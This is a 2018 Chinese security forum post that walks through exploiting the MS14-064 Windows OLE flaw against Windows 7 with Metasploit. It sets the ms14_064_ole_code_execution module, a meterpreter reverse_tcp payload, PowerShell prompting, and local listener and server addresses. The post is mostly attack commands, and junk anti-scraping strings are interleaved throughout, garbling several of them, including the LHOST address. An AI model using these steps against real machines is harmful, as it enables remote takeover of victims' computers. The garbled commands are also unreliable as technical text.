找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1155|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

4 y% o6 A* e: n5 b9 }2 r# U 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示4 h5 x$ t# s8 Q3 Z( r' M$ M

4 s& ~6 z1 ^3 @# a

& [0 O/ Z4 W. g2 H+ M6 ^ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 6 A- ]5 ~' s. {4 ^- X

* ]9 W# C" _. ]. Q3 D

& E6 J' J5 }) Q3 E8 t. o8 | 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp+ J% s x! o9 p% _

+ i' Z6 P2 J4 m9 N/ G. F

* z' b- G7 Y3 A2 ~; s             set AllowPowershellPrompt true' w! b8 w6 ^. D: ~5 k! [

3 s3 b9 H9 Q/ b5 I5 j1 g

5 B" d' c: y/ x4 P             Set LHOST 192.168.0.1097 w; r5 W6 l( \$ _5 v$ X! }; d

- S* o' e* A( Q) m

) w3 W4 b) |" U9 l+ Q# j+ [             set SRVHOST 192.168.0.109 # p) J: } {6 d7 H- _" b+ {

/ ]5 l- W( Z* O: ~( A

3 x z' s; `8 I& l0 b             Set uripath share3 f( Y: |' Q/ G, i* ?" P1 i

j: @( j) v$ @; e

% Q/ H. V- G* n/ U0 J             Set srvport 80+ d3 J! C* x, t$ A' R1 m$ _

F" ]1 u. N! J% t2 s$ y% S. n

; T2 L) R8 D7 R  4 K# Z) a/ v8 _, G( N7 R( k

( ^; B( ^ G! t/ }9 c. E

]/ K ?# |7 I& f/ i7 \* u  9 C8 I) Y" Q3 n! p

' a' ?! D- s$ Q

2 `: j' ?" p% v$ E   & N ^ q+ g+ u, U' t5 j! {1 f

/ c3 ?& a- b$ |; s; M

; W: d* W" @7 y; m   / w7 _5 b) {/ V6 i. C( n$ o, [) w

1 y$ n! T- P2 n5 f

; j& z' {: g# G0 L2 I5 `  ' F& Q2 `5 [$ Z! b E: i

) e8 T+ P" z% B1 }

. ?: J8 H- `' k; R" Y/ h 下面我们来访问本地地址如图: 0 B. G, L0 D1 {& c- e7 g* c* x

$ ]( \$ h$ N! g) T0 d. r6 J

" V+ R6 d+ T5 H/ o; F/ E" c  * Q+ H0 X1 a: y. U2 \' t

- u2 ?/ L( n! W P( S6 q7 _

! H8 f7 w# f l p( p  5 R. e2 |9 l) l

- d4 `* T2 S, ~

/ Y+ C, z% Y" g1 o6 m: d+ \1 } , }# o; ^% Y! h4 K/ y- v3 i

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表